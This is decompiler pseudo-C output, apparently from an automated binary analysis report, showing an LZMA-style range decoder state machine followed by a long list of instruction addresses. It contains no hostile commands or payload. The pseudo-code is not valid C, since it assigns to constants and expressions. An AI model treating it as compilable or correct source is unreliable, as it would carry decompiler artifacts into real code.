							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                    0x00000000
                    0x00406398
                    0x00406398
                    0x0040639c
                    0x00406453
                    0x00406456
                    0x00406462
                    0x00406343
                    0x00406343
                    0x00406346
                    0x004066b8
                    0x004066b8
                    0x004066bb
                    0x004066bb
                    0x004066c1
                    0x004066c7
                    0x004066cd
                    0x004066e7
                    0x004066ea
                    0x004066f0
                    0x004066fb
                    0x004066fd
                    0x004066cf
                    0x004066cf
                    0x004066de
                    0x004066e2
                    0x004066e2
                    0x00406707
                    0x0040672e
                    0x0040672e
                    0x00406734
                    0x00406734
                    0x00000000
                    0x00406709
                    0x00406709
                    0x0040670d
                    0x004068bc
                    0x00000000
                    0x004068bc
                    0x00406719
                    0x00406720
                    0x00406728
                    0x0040672b
                    0x00000000
                    0x0040672b
                    0x004063a2
                    0x004063a6
                    0x004068e7
                    0x004068e7
                    0x004068ea
                    0x004068ee
                    0x004068ee
                    0x004063ac
                    0x004063b2
                    0x004063b5
                    0x004063b9
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x004068d2
                    0x004068da
                    0x004068e1
                    0x004068e3
                    0x00000000
                    0x004068e3
                    0x004063c6
                    0x004063c9
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x004063fa
                    0x004063fa
                    0x004063fa
                    0x00405ed0
                    0x00405ed0
                    0x00405ed9
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x00000000
                    0x00405eea
                    0x00000000
                    0x00000000
                    0x00405ef3
                    0x00405ef6
                    0x00405ef9
                    0x00405efd
                    0x00000000
                    0x00000000
                    0x00405f03
                    0x00405f06
                    0x00405f08
                    0x00405f09
                    0x00405f0c
                    0x00405f0e
                    0x00405f0f
                    0x00405f11
                    0x00405f14
                    0x00405f19
                    0x00405f1e
                    0x00405f27
                    0x00405f3a
                    0x00405f3d
                    0x00405f49
                    0x00405f71
                    0x00405f73
                    0x00405f81
                    0x00405f81
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405f75
                    0x00405f75
                    0x00405f78
                    0x00405f79
                    0x00405f79
                    0x00000000
                    0x00405f75
                    0x00405f4f
                    0x00405f54
                    0x00405f54
                    0x00405f5d
                    0x00405f65
                    0x00405f68
                    0x00000000
                    0x00405f6e
                    0x00405f6e
                    0x00000000
                    0x00405f6e
                    0x00000000
                    0x00405f8b
                    0x00405f8b
                    0x00405f8f
                    0x0040683b
                    0x00000000
                    0x0040683b
                    0x00405f98
                    0x00405fa8
                    0x00405fab
                    0x00405fae
                    0x00405fae
                    0x00405fae
                    0x00405fb1
                    0x00405fb5
                    0x00000000
                    0x00000000
                    0x00405fb7
                    0x00405fbd
                    0x00405fe7
                    0x00405fed
                    0x00405ff4
                    0x00000000
                    0x00405ff4
                    0x00405fc3
                    0x00405fc6
                    0x00405fcb
                    0x00405fcb
                    0x00405fd6
                    0x00405fde
                    0x00405fe1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406026
                    0x0040602c
                    0x0040602f
                    0x0040603c
                    0x00406044
                    0x00000000
                    0x00000000
                    0x00405ffb
                    0x00405ffb
                    0x00405fff
                    0x0040684a
                    0x00000000
                    0x0040684a
                    0x0040600b
                    0x00406016
                    0x00406016
                    0x00406016
                    0x00406019
                    0x0040601c
                    0x0040601f
                    0x00406024
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040604c
                    0x0040604e
                    0x00406051
                    0x004060c2
                    0x004060c5
                    0x004060c8
                    0x004060cf
                    0x004060d9
                    0x00000000
                    0x004060d9
                    0x00406053
                    0x00406057
                    0x0040605a
                    0x0040605c
                    0x0040605f
                    0x00406062
                    0x00406064
                    0x00406067
                    0x00406069
                    0x0040606e
                    0x00406071
                    0x00406074
                    0x00406078
                    0x0040607f
                    0x00406082
                    0x00406089
                    0x0040608d
                    0x00406095
                    0x00406095
                    0x00406095
                    0x0040608f
                    0x0040608f
                    0x0040608f
                    0x00406084
                    0x00406084
                    0x00406084
                    0x00406099
                    0x0040609c
                    0x004060ba
                    0x004060bc
                    0x00000000
                    0x0040609e
                    0x0040609e
                    0x004060a1
                    0x004060a4
                    0x004060a7
                    0x004060a9
                    0x004060a9
                    0x004060a9
                    0x004060ac
                    0x004060af
                    0x004060b1
                    0x004060b2
                    0x004060b5
                    0x00000000
                    0x004060b5
                    0x00000000
                    0x004062eb
                    0x004062ef
                    0x0040630d
                    0x00406310
                    0x00406317
                    0x0040631a
                    0x0040631d
                    0x00406320
                    0x00406323
                    0x00406326
                    0x00406328
                    0x0040632f
                    0x00406330
                    0x00406332
                    0x00406335
                    0x00406338
                    0x0040633b
                    0x0040633b
                    0x00406340
                    0x00000000
                    0x00406340
                    0x004062f1
                    0x004062f4
                    0x004062f7
                    0x00406301
                    0x00000000
                    0x00000000
                    0x00406355
                    0x00406359
                    0x0040637c
                    0x0040637f
                    0x00406382
                    0x0040638c
                    0x0040635b
                    0x0040635b
                    0x0040635e
                    0x00406361
                    0x00406364
                    0x00406371
                    0x00406374
                    0x00406374
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406409
                    0x0040640d
                    0x00406414
                    0x00406417
                    0x0040641a
                    0x00406424
                    0x00000000
                    0x00406424
                    0x0040640f
